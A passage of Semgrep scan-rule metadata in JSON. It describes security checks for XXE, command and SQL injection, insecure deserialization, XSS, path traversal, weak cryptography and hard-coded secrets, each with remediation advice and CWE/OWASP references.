[https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","id":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","name":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","id":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","name":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","id":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","name":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask)\n - [https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command](https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","id":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","name":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"help":{"markdown":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message)\n - [https://www.damonkohler.com/2008/12/email-injection.html](https://www.damonkohler.com/2008/12/email-injection.html)\n","text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","id":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","name":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","properties":{"precision":"very-high","tags":["CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask","id":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","name":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-flask.sqlalchemy-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","id":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","name":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Facebook OAuth detected"},"help":{"markdown":"Facebook OAuth detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Facebook OAuth detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","id":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","name":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"help":{"markdown":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption](https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption)\n - [https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0](https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0)\n","text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","id":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","name":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","id":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","name":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request)\n - [https://github.com/parnurzeal/gorequest](https://github.com/parnurzeal/gorequest)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","id":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","name":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","id":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","name":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User controlled data in a HTML string may result in XSS"},"help":{"markdown":"User controlled data in a HTML string may result in XSS\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat)\n - [https://owasp.org/www-community/attacks/xss/](https://owasp.org/www-community/attacks/xss/)\n","text":"User controlled data in a HTML string may result in XSS"},"helpUri":"https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat","id":"javascript.browser.security.raw-html-concat.raw-html-concat","name":"javascript.browser.security.raw-html-concat.raw-html-concat","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.raw-html-concat.raw-html-concat"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be 